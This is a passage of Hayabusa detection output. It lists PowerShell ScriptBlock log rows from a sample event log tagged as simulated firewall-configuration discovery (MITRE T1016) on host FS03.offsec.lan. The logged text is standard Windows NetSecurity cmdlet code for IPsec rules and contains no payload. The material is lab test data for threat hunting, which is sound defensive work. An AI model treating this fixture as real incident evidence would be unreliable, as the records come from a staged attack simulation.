IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; Param",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,eterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue =,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] 